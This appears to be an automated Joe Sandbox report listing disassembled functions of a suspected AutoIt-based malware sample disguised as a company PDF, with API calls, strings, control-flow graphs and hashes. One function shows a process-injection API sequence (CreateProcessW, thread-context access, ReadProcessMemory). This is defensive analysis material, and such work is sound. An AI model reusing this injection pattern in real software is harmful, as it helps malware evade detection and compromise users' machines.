                                                                                                                      • API ID: CreateFileSleep
                                                                                                                      • String ID: Y33L5H9DQYCDQAA8M7ZN0J
                                                                                                                      • API String ID: 2694422964-3120167010
                                                                                                                      • Opcode ID: 6402d8c42e8b075ace5a46948f20192f0ac04f277e733e09f56231174d21485e
                                                                                                                      • Instruction ID: 0bc1624dc02383303cc4271ee5e3083859d5f568b102953e3d0802e91929f449
                                                                                                                      • Opcode Fuzzy Hash: 6402d8c42e8b075ace5a46948f20192f0ac04f277e733e09f56231174d21485e
                                                                                                                      • Instruction Fuzzy Hash: 8F617130D04348DBEF11DBE8D854BEEBB75AF18304F044199E249BB2C0D6BA5B85CB66
                                                                                                                      Function 0075410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1099 75410d-754123 1100 754200-754204 1099->1100 1101 754129-75413e call 757b76 1099->1101 1104 754144-754164 call 757d2c 1101->1104 1105 78d5dd-78d5ec LoadStringW 1101->1105 1107 78d5f7-78d60f call 757c8e call 757143 1104->1107 1109 75416a-75416e 1104->1109 1105->1107 1117 75417e-7541fb call 773020 call 75463e call 772ffc Shell_NotifyIconW call 755a64 1107->1117 1121 78d615-78d633 call 757e0b call 757143 call 757e0b 1107->1121 1111 754205-75420e call 7581a7 1109->1111 1112 754174-754179 call 757c8e 1109->1112 1111->1117 1112->1117 1117->1100 1121->1117
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0078D5EC
                                                                                                                        • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                                                                                                                      • _memset.LIBCMT ref: 0075418D
                                                                                                                      • _wcscpy.LIBCMT ref: 007541E1
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007541F1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                      • String ID: Line:
                                                                                                                      • API String ID: 3942752672-1585850449
                                                                                                                      • Opcode ID: b372e05205f2015c37ecd567e51c8383233eea10a4c42684d62a6ac2f22e1061
                                                                                                                      • Instruction ID: 10222e01a4b7993ba6ccb92c8497b136eaa1d56cb9eb5c63f38d7e609f8983ff
                                                                                                                      • Opcode Fuzzy Hash: b372e05205f2015c37ecd567e51c8383233eea10a4c42684d62a6ac2f22e1061
                                                                                                                      • Instruction Fuzzy Hash: 3631C1714083089AD725EB60EC4ABDB77ECBF44305F10851AF995920A1EBBC9A9CC796
                                                                                                                      Function 0077564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1134 77564d-775666 1135 775683 1134->1135 1136 775668-77566d 1134->1136 1138 775685-77568b 1135->1138 1136->1135 1137 77566f-775671 1136->1137 1139 775673-775678 call 778d68 1137->1139 1140 77568c-775691 1137->1140 1152 77567e call 778ff6 1139->1152 1142 775693-77569d 1140->1142 1143 77569f-7756a3 1140->1143 1142->1143 1145 7756c3-7756d2 1142->1145 1146 7756a5-7756b0 call 773020 1143->1146 1147 7756b3-7756b5 1143->1147 1150 7756d4-7756d7 1145->1150 1151 7756d9 1145->1151 1146->1147 1147->1139 1149 7756b7-7756c1 1147->1149 1149->1139 1149->1145 1154 7756de-7756e3 1150->1154 1151->1154 1152->1135 1156 7757cc-7757cf 1154->1156 1157 7756e9-7756f0 1154->1157 1156->1138 1158 7756f2-7756fa 1157->1158 1159 775731-775733 1157->1159 1158->1159 1162 7756fc 1158->1162 1160 775735-775737 1159->1160 1161 77579d-77579e call 780df7 1159->1161 1163 77575b-775766 1160->1163 1164 775739-775741 1160->1164 1171 7757a3-7757a7 1161->1171 1166 775702-775704 1162->1166 1167 7757fa 1162->1167 1172 77576a-77576d 1163->1172 1173 775768 1163->1173 1169 775743-77574f 1164->1169 1170 775751-775755 1164->1170 1174 775706-775708 1166->1174 1175 77570b-775710 1166->1175 1168 7757fe-775807 1167->1168 1168->1138 1176 775757-775759 1169->1176 1170->1176 1171->1168 1177 7757a9-7757ae 1171->1177 1178 7757d4-7757d8 1172->1178 1179 77576f-77577b call 774916 call 7810ab 1172->1179 1173->1172 1174->1175 1175->1178 1180 775716-77572f call 780f18 1175->1180 1176->1172 1177->1178 1181 7757b0-7757c1 1177->1181 1182 7757ea-7757f5 call 778d68 1178->1182 1183 7757da-7757e7 call 773020 1178->1183 1195 775780-775785 1179->1195 1191 775792-77579b 1180->1191 1187 7757c4-7757c6 1181->1187 1182->1152 1183->1182 1187->1156 1187->1157 1191->1187 1196 77580c-775810 1195->1196 1197 77578b-77578e 1195->1197 1196->1168 1197->1167 1198 775790 1197->1198 1198->1191
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1559183368-0
                                                                                                                      • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                                                                                      • Instruction ID: f0476e0d1d8db384f5ec03ac899d67bba93a2be0b01370cfb3e3afbc7d5d5b12
                                                                                                                      • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                                                                                      • Instruction Fuzzy Hash: D151B330B00B09DBDF289F79C88466E77A5AF407A0F64C729F82DD62D0D7B89D518B90
                                                                                                                      Function 007569CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00754F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754F6F
                                                                                                                      • _free.LIBCMT ref: 0078E68C
                                                                                                                      • _free.LIBCMT ref: 0078E6D3
                                                                                                                        • Part of subcall function 00756BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00756D0D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                      • API String ID: 2861923089-1757145024
                                                                                                                      • Opcode ID: f2c5222a039b327897731e7ec52f04b0c7f9a9918dcfd20fd74b9eb79ba2bff3
                                                                                                                      • Instruction ID: 539f0abec368e4b76dc02074a3398c7bb3077f6824d03b0a05cbb832e727b03e
                                                                                                                      • Opcode Fuzzy Hash: f2c5222a039b327897731e7ec52f04b0c7f9a9918dcfd20fd74b9eb79ba2bff3
                                                                                                                      • Instruction Fuzzy Hash: F0918071A10219EFCF04EFA4CC959EDB7B4FF15314F14446AF815AB291EB78A905CB60
                                                                                                                      Function 0075F8CF Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 168comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 007703A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007703D3
                                                                                                                        • Part of subcall function 007703A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 007703DB
                                                                                                                        • Part of subcall function 007703A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007703E6
                                                                                                                        • Part of subcall function 007703A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007703F1
                                                                                                                        • Part of subcall function 007703A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 007703F9
                                                                                                                        • Part of subcall function 007703A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00770401
                                                                                                                        • Part of subcall function 00766259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0075FA90), ref: 007662B4
                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0075FB2D
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0075FBAA
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 007949F2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                      • String ID: %~
                                                                                                                      • API String ID: 1986988660-3145668672
                                                                                                                      • Opcode ID: cb7180ca1cca4ddfb09a8255270af7219e369fedfa636ab692c50ed58ff0119e
                                                                                                                      • Instruction ID: 3bc38c4299a827862249cd09fe03372ef9a6c97d90c8db34e13af8822d53189a
                                                                                                                      • Opcode Fuzzy Hash: cb7180ca1cca4ddfb09a8255270af7219e369fedfa636ab692c50ed58ff0119e
                                                                                                                      • Instruction Fuzzy Hash: 8081C8B0902240CEC784DF69A8496D57BEDFF88318310C67AD49AC73A2FB794468CF58
                                                                                                                      Function 007535B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,007535A1,SwapMouseButtons,00000004,?), ref: 007535D4
                                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,007535A1,SwapMouseButtons,00000004,?,?,?,?,00752754), ref: 007535F5
                                                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,007535A1,SwapMouseButtons,00000004,?,?,?,?,00752754), ref: 00753617
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                      • Opcode ID: ff5e4892d441396625fe2ff81a9305b53728ce35e7f3b6e3d8e4f694733d2347
                                                                                                                      • Instruction ID: 133d447f1ac2657b5012535708b880ca1f613b3c0b8a83b51fecbc0a5784075f
                                                                                                                      • Opcode Fuzzy Hash: ff5e4892d441396625fe2ff81a9305b53728ce35e7f3b6e3d8e4f694733d2347
                                                                                                                      • Instruction Fuzzy Hash: D5115A71511208BFDB208F64DC40EEEB7B8EF04781F00846AF805D7220E2B69F5497A4
                                                                                                                      Function 018D12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 018D1A5B
                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018D1AF1
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018D1B13
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1673001125.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_18d0000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2438371351-0
                                                                                                                      • Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                                                                                                      • Instruction ID: 2b70ebb52905e421d0c8a5b02d1fe4873b233099d2eda58ada81960677520ed4
                                                                                                                      • Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
                                                                                                                      • Instruction Fuzzy Hash: E5620A30A14258DBEB24DFA4C854BDEB772EF58700F1091A9D20DEB390E7799E81CB59
                                                                                                                      Function 007B97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00755045: _fseek.LIBCMT ref: 0075505D
                                                                                                                        • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AAE
                                                                                                                        • Part of subcall function 007B99BE: _wcscmp.LIBCMT ref: 007B9AC1
                                                                                                                      • _free.LIBCMT ref: 007B992C
                                                                                                                      • _free.LIBCMT ref: 007B9933
                                                                                                                      • _free.LIBCMT ref: 007B999E
                                                                                                                        • Part of subcall function 00772F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00779C64), ref: 00772FA9
                                                                                                                        • Part of subcall function 00772F95: GetLastError.KERNEL32(00000000,?,00779C64), ref: 00772FBB
                                                                                                                      • _free.LIBCMT ref: 007B99A6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1552873950-0
                                                                                                                      • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                                                                                      • Instruction ID: 796aeca3e29dba7aa5884e4efe00fd3cac3c3a9dbf4f2725bd40ae4078f0b151
                                                                                                                      • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                                                                                                      • Instruction Fuzzy Hash: 7A515DB1904258EFDF249F64CC45ADEBBB9EF48300F1044AEF659A7281DB755A80CF58
                                                                                                                      Function 0077493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2782032738-0
                                                                                                                      • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                                                                                      • Instruction ID: 4bc78bf27f2afb397134274d7043d027d0c0b093fb8a1b4db6a4d5dc839b2eb8
                                                                                                                      • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                                                                                      • Instruction Fuzzy Hash: BE41C571740705ABDF288E69C88496F77A9EF803E0B24C57DE95D87640E778ED408B44
                                                                                                                      Function 00754DD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove
                                                                                                                      • String ID: AU3!P/~$EA06
                                                                                                                      • API String ID: 4104443479-1801474073
                                                                                                                      • Opcode ID: eb3d0f09e1feb4dfca09f75853281cb80e40027f7897928db03b3a2c469b97c1
                                                                                                                      • Instruction ID: 66ca4c0ec9a4611e91b6af490d41243356a733192373cb7dea6974bb61f5525b
                                                                                                                      • Opcode Fuzzy Hash: eb3d0f09e1feb4dfca09f75853281cb80e40027f7897928db03b3a2c469b97c1
                                                                                                                      • Instruction Fuzzy Hash: 90416C32A041949BDF215B64CC677FE7FA5AF0130AF584065EC869A2C2C5ED8DCC83A1
                                                                                                                      Function 007573E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0078EE62
                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 0078EEAC
                                                                                                                        • Part of subcall function 007548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007548A1,?,?,007537C0,?), ref: 007548CE
                                                                                                                        • Part of subcall function 007709D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007709F4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 3777226403-3081909835
                                                                                                                      • Opcode ID: ba0d662d176931f3ca38e98ab59809276006b04a9bd98cd1804ae34cd81af6bc
                                                                                                                      • Instruction ID: 7c14bfb19ffaf51933c340d614a8bc29c9d7ecf3d7dcedc22496a928f7014505
                                                                                                                      • Opcode Fuzzy Hash: ba0d662d176931f3ca38e98ab59809276006b04a9bd98cd1804ae34cd81af6bc
                                                                                                                      • Instruction Fuzzy Hash: FB219271A002989BDB459B94D849BEE7BF8AF49315F00801AE948E7281DBF8598DCB91
                                                                                                                      Function 007B901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock_memmove
                                                                                                                      • String ID: EA06
                                                                                                                      • API String ID: 1988441806-3962188686
                                                                                                                      • Opcode ID: 718c693b5f9169a48f42dc08829addb75543d674ccd67bdaf7d670ab1e3337c1
                                                                                                                      • Instruction ID: f3d6004d4ecc7e463d1a6ee4242eed9f3ead08c1dc74d2dbe8bc22abb264390f
                                                                                                                      • Opcode Fuzzy Hash: 718c693b5f9169a48f42dc08829addb75543d674ccd67bdaf7d670ab1e3337c1
                                                                                                                      • Instruction Fuzzy Hash: B5019671904258AEDB28D7A8C85ABEE7BF8DB15301F00859AE656D2181E5B9A6048760
                                                                                                                      Function 007B9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 007B9B82
                                                                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007B9B99
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Temp$FileNamePath
                                                                                                                      • String ID: aut
                                                                                                                      • API String ID: 3285503233-3010740371
                                                                                                                      • Opcode ID: 060e5463cd69482f800d517db648ea7394afb14f003e869021e212030c755142
                                                                                                                      • Instruction ID: 49fd0c968475d0075aa56b949f5e8a51e39a2aed699ced8ae587441542ee3ba2
                                                                                                                      • Opcode Fuzzy Hash: 060e5463cd69482f800d517db648ea7394afb14f003e869021e212030c755142
                                                                                                                      • Instruction Fuzzy Hash: 93D05E7954130DABDB60AB90DC0EF9A773CF704700F0082A2FE65D11A1DEB865988B99
                                                                                                                      Function 007CCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 1a9a48b366fdb3534b659ec4f69353e95d34beb7cbb69799a9d21069289ec451
                                                                                                                      • Instruction ID: d99be66d428c91cebc975c308a1c8eab63c2826c2fddf02a802750a1775c3b4c
